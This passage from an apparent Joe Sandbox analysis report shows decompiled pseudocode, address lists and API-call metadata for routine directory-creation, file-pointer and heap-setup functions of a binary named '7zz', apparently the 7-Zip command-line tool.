                                                                                                                                    0x00418be3
                                                                                                                                    0x00418be6
                                                                                                                                    0x00418be6
                                                                                                                                    0x00418aec
                                                                                                                                    0x00418af5
                                                                                                                                    0x00418af7
                                                                                                                                    0x00418aff
                                                                                                                                    0x00418b07
                                                                                                                                    0x00418b0c
                                                                                                                                    0x00418b0f
                                                                                                                                    0x00418b18
                                                                                                                                    0x00418b1d
                                                                                                                                    0x00418b1d
                                                                                                                                    0x00418b20
                                                                                                                                    0x00418b20
                                                                                                                                    0x00418aea
                                                                                                                                    0x00418c92
                                                                                                                                    0x00418c9a

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00418A28
                                                                                                                                    • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,00000000,00000000), ref: 00418AEC
                                                                                                                                      • Part of subcall function 00418C9D: __EH_prolog.LIBCMT ref: 00418CA2
                                                                                                                                      • Part of subcall function 00418E2D: __EH_prolog.LIBCMT ref: 00418E32
                                                                                                                                      • Part of subcall function 00418554: __EH_prolog.LIBCMT ref: 00418559
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2901101390-0
                                                                                                                                    • Opcode ID: 838c0c1b1d108713408f409259016803b1c4a1e3f4d3df780f5c75c52faaa947
                                                                                                                                    • Instruction ID: 21ff3a450d6b3ea728cd5a75b88ce90788197c2b0c5ee23b9bcb2e1d4e856eb5
                                                                                                                                    • Opcode Fuzzy Hash: 838c0c1b1d108713408f409259016803b1c4a1e3f4d3df780f5c75c52faaa947
                                                                                                                                    • Instruction Fuzzy Hash: 9F814771D04209EBCF01EFA5D881ADEBBB5BF08314F14456EF415B32A1DB39AA44CBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00409D7C Relevance: 3.2, APIs: 2, Instructions: 179COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                    			E00409D7C(void* __ecx) {
				signed int _t64;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed char _t75;
				long _t78;
				signed int _t80;
				signed char _t82;
				signed int _t87;
				intOrPtr* _t88;
				void* _t92;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t109;
				signed int _t116;
				intOrPtr _t123;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				void* _t132;
				signed int _t135;
				void* _t138;

				L0046B890(0x473ab8, _t138);
				L00403532(_t138 - 0x18, __ecx);
				_t109 =  *(_t138 - 0x14);
				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
				_t132 = 0x5c;
				if(_t109 == 0) {
					L13:
					L004039C0(_t138 - 0x24, _t138 - 0x18);
					_t135 =  *(_t138 - 0x14);
					 *(_t138 - 4) = 1;
					while(1) {
						L14:
						_t64 = E00409CCB( *((intOrPtr*)(_t138 - 0x18))); // executed
						__eflags = _t64;
						if(_t64 != 0) {
							break;
						}
						_t78 = GetLastError();
						__eflags = _t78 - 0xb7;
						if(_t78 == 0xb7) {
							L0040351A(_t138 - 0x40);
							 *(_t138 - 4) = 2;
							_t80 = E0040B431(_t138 - 0x68, _t128, __eflags,  *((intOrPtr*)(_t138 - 0x18))); // executed
							__eflags = _t80;
							if(_t80 != 0) {
								_t82 =  *(_t138 - 0x48) >> 4;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									 *(_t138 - 4) = 1;
									E00407A18( *((intOrPtr*)(_t138 - 0x40)));
									break;
								} else {
									_t102 = 0;
									__eflags = 0;
									goto L31;
								}
							} else {
								_t102 = 1;
								L31:
								E00407A18( *((intOrPtr*)(_t138 - 0x40)));
								E00407A18( *((intOrPtr*)(_t138 - 0x24)));
								E00407A18( *((intOrPtr*)(_t138 - 0x18)));
							}
						} else {
							_t87 =  *(_t138 - 0x14);
							__eflags = _t87;
							if(_t87 == 0) {
								L44:
								_t102 = 0;
								__eflags = 0;
								L45:
								E00407A18( *((intOrPtr*)(_t138 - 0x24)));
								_t129 =  *((intOrPtr*)(_t138 - 0x18));
								goto L46;
							} else {
								_t123 =  *((intOrPtr*)(_t138 - 0x18));
								_t88 = _t123 + _t87 * 2 - 2;
								while(1) {
									__eflags =  *_t88 - _t132;
									if( *_t88 == _t132) {
										break;
									}
									__eflags = _t88 - _t123;
									if(_t88 == _t123) {
										_t135 = _t135 | 0xffffffff;
										__eflags = _t135;
									} else {
										_t88 = _t88;
										continue;
									}
									L23:
									__eflags = _t135;
									if(__eflags < 0 || __eflags == 0) {
										goto L44;
									} else {
										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a;
										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) {
											goto L44;
										} else {
											_t92 = L00407399(_t138 - 0x18, _t138 - 0x30, _t135);
											 *(_t138 - 4) = 3;
											E00401E26(_t138 - 0x18, _t92);
											 *(_t138 - 4) = 1;
											E00407A18( *((intOrPtr*)(_t138 - 0x30)));
											goto L14;
										}
									}
									goto L47;
								}
								_t135 = _t88 - _t123 >> 1;
								goto L23;
							}
						}
						goto L47;
					}
					E00401E26(_t138 - 0x18, _t138 - 0x24);
					while(1) {
						L34:
						__eflags = _t135 -  *(_t138 - 0x14);
						if(_t135 >=  *(_t138 - 0x14)) {
							break;
						}
						_t130 =  *((intOrPtr*)(_t138 - 0x18));
						_t70 = _t130 + 2 + _t135 * 2;
						while(1) {
							_t116 =  *_t70;
							__eflags = _t116 - _t132;
							if(_t116 == _t132) {
								break;
							}
							__eflags = _t116;
							if(_t116 == 0) {
								_t135 = _t135 | 0xffffffff;
								__eflags = _t135;
							} else {
								_t70 = _t70 + 2;
								continue;
							}
							L41:
							__eflags = _t135;
							if(_t135 < 0) {
								_t135 =  *(_t138 - 0x14);
							}
							_t74 = L00407399(_t138 - 0x18, _t138 - 0x30, _t135);
							 *(_t138 - 4) = 4;
							_t75 = E00409CCB( *_t74);
							 *(_t138 - 4) = 1;
							asm("sbb bl, bl");
							E00407A18( *((intOrPtr*)(_t138 - 0x30)));
							__eflags =  ~_t75 + 1;
							if( ~_t75 + 1 == 0) {
								goto L34;
							} else {
								goto L44;
							}
							goto L45;
						}
						_t135 = _t70 - _t130 >> 1;
						goto L41;
					}
					_t102 = 1;
					goto L45;
				} else {
					_t128 =  *((intOrPtr*)(_t138 - 0x18));
					_t96 = _t128 + _t109 * 2 - 2;
					while( *_t96 != _t132) {
						if(_t96 == _t128) {
							_t98 = _t96 | 0xffffffff;
							__eflags = _t98;
						} else {
							_t96 = _t96;
							continue;
						}
						L7:
						__eflags = _t98;
						if(_t98 <= 0) {
							goto L13;
						} else {
							__eflags = _t98 - _t109 - 1;
							if(_t98 != _t109 - 1) {
								goto L13;
							} else {
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									L12:
									L004075A5(_t138 - 0x18, _t98, 1);
									goto L13;
								} else {
									__eflags =  *((short*)(_t128 + 2)) - 0x3a;
									if( *((short*)(_t128 + 2)) != 0x3a) {
										goto L12;
									} else {
										_t102 = 1;
										L46:
										E00407A18(_t129);
									}
								}
							}
						}
						goto L47;
					}
					_t98 = _t96 - _t128 >> 1;
					goto L7;
				}
				L47:
				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
				return _t102;
			}

























                                                                                                                                    0x00409d81
                                                                                                                                    0x00409d90
                                                                                                                                    0x00409d95
                                                                                                                                    0x00409d98
                                                                                                                                    0x00409da0
                                                                                                                                    0x00409da1
                                                                                                                                    0x00409de9
                                                                                                                                    0x00409df0
                                                                                                                                    0x00409df5
                                                                                                                                    0x00409df8
                                                                                                                                    0x00409dfc
                                                                                                                                    0x00409dfc
                                                                                                                                    0x00409dff
                                                                                                                                    0x00409e04
                                                                                                                                    0x00409e06
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e0c
                                                                                                                                    0x00409e12
                                                                                                                                    0x00409e17
                                                                                                                                    0x00409e8c
                                                                                                                                    0x00409e97
                                                                                                                                    0x00409e9b
                                                                                                                                    0x00409ea0
                                                                                                                                    0x00409ea2
                                                                                                                                    0x00409eab
                                                                                                                                    0x00409eae
                                                                                                                                    0x00409eb0
                                                                                                                                    0x00409ed7
                                                                                                                                    0x00409edb
                                                                                                                                    0x00000000
                                                                                                                                    0x00409eb2
                                                                                                                                    0x00409eb2
                                                                                                                                    0x00409eb2
                                                                                                                                    0x00000000
                                                                                                                                    0x00409eb2
                                                                                                                                    0x00409ea4
                                                                                                                                    0x00409ea4
                                                                                                                                    0x00409eb4
                                                                                                                                    0x00409eb7
                                                                                                                                    0x00409ebf
                                                                                                                                    0x00409ec7
                                                                                                                                    0x00409ecc
                                                                                                                                    0x00409e19
                                                                                                                                    0x00409e19
                                                                                                                                    0x00409e1c
                                                                                                                                    0x00409e1e
                                                                                                                                    0x00409f51
                                                                                                                                    0x00409f51
                                                                                                                                    0x00409f51
                                                                                                                                    0x00409f53
                                                                                                                                    0x00409f56
                                                                                                                                    0x00409f5b
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e24
                                                                                                                                    0x00409e24
                                                                                                                                    0x00409e27
                                                                                                                                    0x00409e2b
                                                                                                                                    0x00409e2b
                                                                                                                                    0x00409e2e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e30
                                                                                                                                    0x00409e32
                                                                                                                                    0x00409e40
                                                                                                                                    0x00409e40
                                                                                                                                    0x00409e34
                                                                                                                                    0x00409e35
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e35
                                                                                                                                    0x00409e43
                                                                                                                                    0x00409e43
                                                                                                                                    0x00409e45
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e51
                                                                                                                                    0x00409e51
                                                                                                                                    0x00409e57
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e5d
                                                                                                                                    0x00409e65
                                                                                                                                    0x00409e6e
                                                                                                                                    0x00409e72
                                                                                                                                    0x00409e77
                                                                                                                                    0x00409e7e
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e83
                                                                                                                                    0x00409e57
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e45
                                                                                                                                    0x00409e3c
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e3c
                                                                                                                                    0x00409e1e
                                                                                                                                    0x00000000
                                                                                                                                    0x00409e17
                                                                                                                                    0x00409ee8
                                                                                                                                    0x00409eed
                                                                                                                                    0x00409eed
                                                                                                                                    0x00409eed
                                                                                                                                    0x00409ef0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00409ef6
                                                                                                                                    0x00409ef9
                                                                                                                                    0x00409efd
                                                                                                                                    0x00409efd
                                                                                                                                    0x00409f00
                                                                                                                                    0x00409f03
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00409f05
                                                                                                                                    0x00409f08
                                                                                                                                    0x00409f16
                                                                                                                                    0x00409f16
                                                                                                                                    0x00409f0a
                                                                                                                                    0x00409f0b
                                                                                                                                    0x00000000
                                                                                                                                    0x00409f0b
                                                                                                                                    0x00409f19
                                                                                                                                    0x00409f19
                                                                                                                                    0x00409f1b
                                                                                                                                    0x00409f1d
                                                                                                                                    0x00409f1d
                                                                                                                                    0x00409f28
                                                                                                                                    0x00409f2f
                                                                                                                                    0x00409f33
                                                                                                                                    0x00409f3a
                                                                                                                                    0x00409f43
                                                                                                                                    0x00409f47
                                                                                                                                    0x00409f4c
                                                                                                                                    0x00409f4f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00409f4f
                                                                                                                                    0x00409f12
                                                                                                                                    0x00000000
                                                                                                                                    0x00409f12
                                                                                                                                    0x00409f77
                                                                                                                                    0x00000000
                                                                                                                                    0x00409da3
                                                                                                                                    0x00409da3
                                                                                                                                    0x00409da6
                                                                                                                                    0x00409daa
                                                                                                                                    0x00409db1
                                                                                                                                    0x00409dbd
                                                                                                                                    0x00409dbd
                                                                                                                                    0x00409db3
                                                                                                                                    0x00409db4
                                                                                                                                    0x00000000
                                                                                                                                    0x00409db4
                                                                                                                                    0x00409dc0
                                                                                                                                    0x00409dc0
                                                                                                                                    0x00409dc2
                                                                                                                                    0x00000000
                                                                                                                                    0x00409dc4
                                                                                                                                    0x00409dc7
                                                                                                                                    0x00409dc9
                                                                                                                                    0x00000000
                                                                                                                                    0x00409dcb
                                                                                                                                    0x00409dcb
                                                                                                                                    0x00409dce
                                                                                                                                    0x00409dde
                                                                                                                                    0x00409de4
                                                                                                                                    0x00000000
                                                                                                                                    0x00409dd0
                                                                                                                                    0x00409dd0
                                                                                                                                    0x00409dd5
                                                                                                                                    0x00000000
                                                                                                                                    0x00409dd7
                                                                                                                                    0x00409dd7
                                                                                                                                    0x00409f5f
                                                                                                                                    0x00409f60
                                                                                                                                    0x00409f65
                                                                                                                                    0x00409dd5
                                                                                                                                    0x00409dce
                                                                                                                                    0x00409dc9
                                                                                                                                    0x00000000
                                                                                                                                    0x00409dc2
                                                                                                                                    0x00409db9
                                                                                                                                    0x00000000
                                                                                                                                    0x00409db9
                                                                                                                                    0x00409f66
                                                                                                                                    0x00409f6e
                                                                                                                                    0x00409f76

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00409D81
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00409E0C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorH_prologLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1057991267-0
                                                                                                                                    • Opcode ID: b8a295dd081e3353d224789cbe8a0eb34f7eff43370183e34a9c40608fc1f7ec
                                                                                                                                    • Instruction ID: a50931f9f0b53e642fd9c4839daf4fd4c57a1ea79cde473ef903889cc23e4543
                                                                                                                                    • Opcode Fuzzy Hash: b8a295dd081e3353d224789cbe8a0eb34f7eff43370183e34a9c40608fc1f7ec
                                                                                                                                    • Instruction Fuzzy Hash: DE51DF31D4410ADADF10EBA1C942AEEBB74AF51318F14017BE801B72D2D739AE46C7D9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004183FD Relevance: 3.1, APIs: 2, Instructions: 85COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 52%
                                                                                                                                    			E004183FD(intOrPtr __ecx) {
				long _t31;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr* _t42;
				intOrPtr _t53;
				intOrPtr _t59;
				long _t62;
				void* _t64;
				void* _t65;

				L0046B890(E00474DEA, _t65);
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				 *((intOrPtr*)(_t65 - 0x14)) = 0;
				 *(_t65 - 4) = 0;
				 *((intOrPtr*)(_t65 - 0x10)) = 0;
				 *(_t65 - 4) = 1;
				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
						goto L12;
					} else {
						_push(0x40);
						_t53 = L004079F2();
						 *((intOrPtr*)(_t65 + 0x10)) = _t53;
						 *(_t65 - 4) = 2;
						if(_t53 == 0) {
							_t64 = 0;
						} else {
							_t64 = E0040CF63(_t53);
						}
						 *(_t65 - 4) = 1;
						E0040C9B4(_t65 - 0x14, _t64);
						if(E0040CF41(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
							goto L12;
						} else {
							_t31 = GetLastError();
						}
					}
				} else {
					_push(8);
					_t42 = L004079F2();
					if(_t42 == 0) {
						_t42 = 0;
					} else {
						 *((intOrPtr*)(_t42 + 4)) = 0;
						 *_t42 = 0x47ab90;
					}
					E0040C9B4(_t65 - 0x10, _t42);
					L12:
					_t31 = E00417BAE(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
				}
				_t62 = _t31;
				_t32 =  *((intOrPtr*)(_t65 - 0x10));
				 *(_t65 - 4) = 0;
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 8))(_t32);
				}
				_t33 =  *((intOrPtr*)(_t65 - 0x14));
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if(_t33 != 0) {
					 *((intOrPtr*)( *_t33 + 8))(_t33);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t62;
			}












                                                                                                                                    0x00418402
                                                                                                                                    0x00418407
                                                                                                                                    0x00418408
                                                                                                                                    0x0041840e
                                                                                                                                    0x00418410
                                                                                                                                    0x00418413
                                                                                                                                    0x00418416
                                                                                                                                    0x0041841c
                                                                                                                                    0x00418420
                                                                                                                                    0x00418449
                                                                                                                                    0x00000000
                                                                                                                                    0x0041844b
                                                                                                                                    0x0041844b
                                                                                                                                    0x00418453
                                                                                                                                    0x00418455
                                                                                                                                    0x0041845a
                                                                                                                                    0x0041845e
                                                                                                                                    0x00418469
                                                                                                                                    0x00418460
                                                                                                                                    0x00418465
                                                                                                                                    0x00418465
                                                                                                                                    0x0041846f
                                                                                                                                    0x00418473
                                                                                                                                    0x00418484
                                                                                                                                    0x00418491
                                                                                                                                    0x00000000
                                                                                                                                    0x00418486
                                                                                                                                    0x00418486
                                                                                                                                    0x00418486
                                                                                                                                    0x00418484
                                                                                                                                    0x00418422
                                                                                                                                    0x00418422
                                                                                                                                    0x00418424
                                                                                                                                    0x0041842c
                                                                                                                                    0x00418439
                                                                                                                                    0x0041842e
                                                                                                                                    0x0041842e
                                                                                                                                    0x00418431
                                                                                                                                    0x00418431
                                                                                                                                    0x0041843f
                                                                                                                                    0x00418494
                                                                                                                                    0x004184a5
                                                                                                                                    0x004184a5
                                                                                                                                    0x004184aa
                                                                                                                                    0x004184ac
                                                                                                                                    0x004184b1
                                                                                                                                    0x004184b4
                                                                                                                                    0x004184b9
                                                                                                                                    0x004184b9
                                                                                                                                    0x004184bc
                                                                                                                                    0x004184bf
                                                                                                                                    0x004184c5
                                                                                                                                    0x004184ca
                                                                                                                                    0x004184ca
                                                                                                                                    0x004184d5
                                                                                                                                    0x004184dd

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00418402
                                                                                                                                    • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00418604,?,00000001,?,?,?,?,?,00000000), ref: 00418486
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorH_prologLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1057991267-0
                                                                                                                                    • Opcode ID: 76d906d252eb17f1efae200ba77d67f34424673974c13bee24a70a9bd7151f53
                                                                                                                                    • Instruction ID: 4421d415675076c99ccf6d41903839941164c9ea02229811d1821141610bcbe1
                                                                                                                                    • Opcode Fuzzy Hash: 76d906d252eb17f1efae200ba77d67f34424673974c13bee24a70a9bd7151f53
                                                                                                                                    • Instruction Fuzzy Hash: 1F319F7190011AEFCB14DFA9C9856EEBBA1FF44304F14416FE809A3291DF384E80D76A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040BA47 Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			E0040BA47(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
				long _v8;
				long _v12;
				long _t21;
				long _t22;
				long* _t23;
				void** _t27;

				_t27 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(__ecx[1] != 0 && __ecx[1] != 0 && _a12 == 2) {
					_a4 = __ecx[2] + _a4;
					_a12 = 0;
					asm("adc [ebp+0xc], esi");
				}
				_t21 = _a4;
				_v8 = _a8;
				_v12 = _t21;
				_t22 = SetFilePointer( *_t27, _t21,  &_v8, _a12); // executed
				_v12 = _t22;
				if(_t22 != 0xffffffff || GetLastError() == 0) {
					_t23 = _a16;
					 *_t23 = _v12;
					_t23[1] = _v8;
					return 1;
				} else {
					return 0;
				}
			}









                                                                                                                                    0x0040ba47
                                                                                                                                    0x0040ba4a
                                                                                                                                    0x0040ba4b
                                                                                                                                    0x0040ba51
                                                                                                                                    0x0040ba62
                                                                                                                                    0x0040ba68
                                                                                                                                    0x0040ba6b
                                                                                                                                    0x0040ba6e
                                                                                                                                    0x0040ba75
                                                                                                                                    0x0040ba78
                                                                                                                                    0x0040ba7e
                                                                                                                                    0x0040ba85
                                                                                                                                    0x0040ba8e
                                                                                                                                    0x0040ba91
                                                                                                                                    0x0040baa1
                                                                                                                                    0x0040baa7
                                                                                                                                    0x0040baac
                                                                                                                                    0x00000000
                                                                                                                                    0x0040ba9d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040ba9d

                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040BA85
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0040BA93
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                    • Opcode ID: 7436a2b139077620537afe951a30d7268c4488ead8e20398b421a651f671a27a
                                                                                                                                    • Instruction ID: 7184b7cf4ce748ed61815dc5e944d1670cffa5033586876219b28924bd56fada
                                                                                                                                    • Opcode Fuzzy Hash: 7436a2b139077620537afe951a30d7268c4488ead8e20398b421a651f671a27a
                                                                                                                                    • Instruction Fuzzy Hash: A4014474600248EFCB00CF64D44089E7BB5EF45314B24C5AAE814A7391D376DE45DF99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046EA66 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0046EA66(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x496580 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = L0046E91E(_t12, _t15);
					 *0x496584 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = L0046F60A();
							goto L5;
						}
					} else {
						_t10 = L0046EAC3(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x496580);
							goto L7;
						}
					}
				}
			}








                                                                                                                                    0x0046ea66
                                                                                                                                    0x0046ea77
                                                                                                                                    0x0046ea7d
                                                                                                                                    0x0046ea7f
                                                                                                                                    0x0046ea84
                                                                                                                                    0x0046eabc
                                                                                                                                    0x0046eabe
                                                                                                                                    0x0046ea86
                                                                                                                                    0x0046ea86
                                                                                                                                    0x0046ea8e
                                                                                                                                    0x0046ea93
                                                                                                                                    0x0046eaa2
                                                                                                                                    0x0046eaa5
                                                                                                                                    0x00000000
                                                                                                                                    0x0046eaa7
                                                                                                                                    0x0046eaa7
                                                                                                                                    0x00000000
                                                                                                                                    0x0046eaa7
                                                                                                                                    0x0046ea95
                                                                                                                                    0x0046ea9a
                                                                                                                                    0x0046eaac
                                                                                                                                    0x0046eaae
                                                                                                                                    0x0046eabf
                                                                                                                                    0x0046eac1
                                                                                                                                    0x0046eac2
                                                                                                                                    0x0046eab0
                                                                                                                                    0x0046eab6
                                                                                                                                    0x00000000
                                                                                                                                    0x0046eab6
                                                                                                                                    0x0046eaae
                                                                                                                                    0x0046ea93

                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0046CFAA,00000001), ref: 0046EA77
                                                                                                                                      • Part of subcall function 0046E91E: GetVersionExA.KERNEL32 ref: 0046E93D
                                                                                                                                    • HeapDestroy.KERNEL32 ref: 0046EAB6
                                                                                                                                      • Part of subcall function 0046EAC3: HeapAlloc.KERNEL32(00000000,00000140,0046EA9F,000003F8), ref: 0046EAD0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
